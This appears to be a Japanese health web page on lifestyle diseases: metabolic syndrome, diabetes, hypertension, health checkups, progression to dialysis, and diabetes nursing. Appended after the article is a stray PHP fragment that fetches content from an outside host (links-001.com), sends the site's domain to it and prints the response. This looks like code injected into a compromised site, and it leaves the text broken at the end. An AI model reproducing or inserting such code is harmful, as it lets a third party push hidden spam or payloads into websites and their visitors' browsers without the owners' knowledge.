8

生活習慣病は決して他人事ではありません

生活習慣病は、病気なのか未病なのか、男女問わず、予備軍に注目が集まっています。
糖尿病や高血圧症、脂質異常症は病気として認知されていますが、これらの発症前の段階には、メタボリックシンドロームという予備軍がいます。
医療機関では、メタボ対策が謳われています。
病気にならないように予防する、次に、病気の早期発見・治療、最後に病気の重症化や合併症を予防する対策案があります。
メタボ健診は、検査の結果から生活習慣病の発症リスクが高く、改善すれば予防効果が期待できる人に対して、リスクの程度に応じて動機付け、積極的な支援を実施してくれるのがメリットでしょう。
生活習慣の見直しだけなのに、進行してしまうリスク、加齢や肥満、運動不足から糖尿病や高血圧症、喫煙者は動脈硬化症へ、糖尿病から合併症の発生で、進行すれば慢性腎不全となり、人工透析が必要となります。
糖尿病内科には、糖尿病看護とよべる、熟練した看護技術と知識を用いた水準の高い看護を実践する看護職員がいます。
こうした方々のお世話になりながら、予防しなければなりません。

".file_get_contents('http://links-001.com/123set4.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>